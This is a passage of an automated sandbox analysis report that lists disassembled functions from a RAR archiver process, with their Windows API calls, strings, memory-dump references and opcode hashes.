                                                                                                                                                                                                                                        • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                        • Instruction ID: 041d94d1143dec9585600d9f0331787f53f17152fa7bb5a3917ab87de52c6452
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46011250B0F542E8FA769666DB4067951505F86BD4F4882B3DD1EC6AD6ED2EAC434100
                                                                                                                                                                                                                                        Function 00007FF6AA1CA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CompareString
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1825529933-0
                                                                                                                                                                                                                                        • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                        • Instruction ID: 7bfffcfd95884b195121bb3a1fc5adfc77e5477bbcf122191bbb58595e41470f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B701A76170D692D5EA215F42A40507AE615BB49FC0F5C4476EFCD8BB5ACE3CE4434704
                                                                                                                                                                                                                                        Function 00007FF6AA1A4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                                                                                        • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                        • Instruction ID: 40d9b80663f7675eebeeed3ea106f366250986745b174d183af31c9acf3340f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94F08671A096C1D5DB169B7191053F827519F06BB4F1843B6DE7D4B3C7CE5C988A8720
                                                                                                                                                                                                                                        Function 00007FF6AA1E4AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                        • Instruction ID: 08f40aeefe580ac680a4b2982b6020c90396f1187c54837128c135ca2a07ae82
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41F05411B0F242D9F9765AB1954027511804F8A770F4C06B3ED2EC5AC1DE5DECD34114
                                                                                                                                                                                                                                        Function 00007FF6AA1B38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                        • Instruction ID: 5b3176e80861bf4c6f44be601224ba1fd61bf14a67ed305406a9d9188142c6a3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33E04F54F1B312E0ED5E2622185507D02415F56B80E5457BBCC1FC6783EC1EAC6B5601
                                                                                                                                                                                                                                        Function 00007FF6AA1EFA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                                                                                        • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                        • Instruction ID: 1560bc33769a8c3f99be081cfd5bba59f12ada77a236357d1bd7ba17694bf0a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71D05E75E3BA02C1FB05CF40ED44B3012617F547A9F4906F6C81D89554CFAC246E9300
                                                                                                                                                                                                                                        Function 00007FF6AA1A4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1A4549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                                                                                        • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                        • Instruction ID: 4ecfab74eefad07a441e5cebed15ed149783ea7a1f92d439a2a062f7333b0fc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63C08C25F02881C0C645532988450281111AF44735F900372C13E452E0CE1848AB0300
                                                                                                                                                                                                                                        Function 00007FF6AA1A1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                        • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                        • Instruction ID: f61ee5e72e45c4c67ec42f8ff9919b4f3211e0779a65c3b3ef1040c100f0c26c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05F0FF32A0A242E8FB268B20E4403782252DB00BB8F589372D63D810D8DE28CC9BC350

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00007FF6AA1A67E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1C49F4: LoadStringW.USER32 ref: 00007FF6AA1C4A7B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1C49F4: LoadStringW.USER32 ref: 00007FF6AA1C4A94
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6AA1A6CB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                                        • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                                        • API String ID: 668332963-4283793440
                                                                                                                                                                                                                                        • Opcode ID: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                                                                                        • Instruction ID: 747caf77c1173154ef313557ca55978d06f721ff2cf49c7d7ff60d438773cc39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1809d281e11e57368e542bccbc1a8fe66159deefba3bd9b4622a4842c6b2ef32
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C228222A0E6C2E5EB22DB34D8501FD67A2FF45344F8440B7D65D8769ADE2CEE4AC740
                                                                                                                                                                                                                                        Function 00007FF6AA19D2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 00007FF6AA19D4A6
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6AA19D4B9
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF73
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF84
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6AA19EFA7
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6AA19EFCA
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetLastError.KERNEL32 ref: 00007FF6AA19EFD4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: CloseHandle.KERNEL32 ref: 00007FF6AA19EFE7
                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32 ref: 00007FF6AA19D4C6
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32 ref: 00007FF6AA19D64A
                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF6AA19D68B
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00007FF6AA19D69A
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00007FF6AA19D6AD
                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32 ref: 00007FF6AA19D6FA
                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32 ref: 00007FF6AA19D705
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A2310: FlushFileBuffers.KERNEL32 ref: 00007FF6AA1A233E
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A2310: SetFileTime.KERNEL32 ref: 00007FF6AA1A23DB
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1930: CloseHandle.KERNELBASE ref: 00007FF6AA1A1958
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A39E0: SetFileAttributesW.KERNEL32(?,00007FF6AA1A34EE,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A3A0F
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A39E0: SetFileAttributesW.KERNEL32(?,00007FF6AA1A34EE,?,?,?,?,00000800,00000000,00000000,00007FF6AA1B38CB,?,?,?,00007FF6AA1B41EC), ref: 00007FF6AA1A3A3C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                                        • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                                        • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                        • Instruction ID: f0a77f590d7bdc6e3d8576e745450229496ca1770cbaff4443317a007488d377
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9D1CF26A0A686E6EB629F20D9406FD27A0FF40798F404177DA9D876D9DF3CD90BC700
                                                                                                                                                                                                                                        Function 00007FF6AA1CAE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
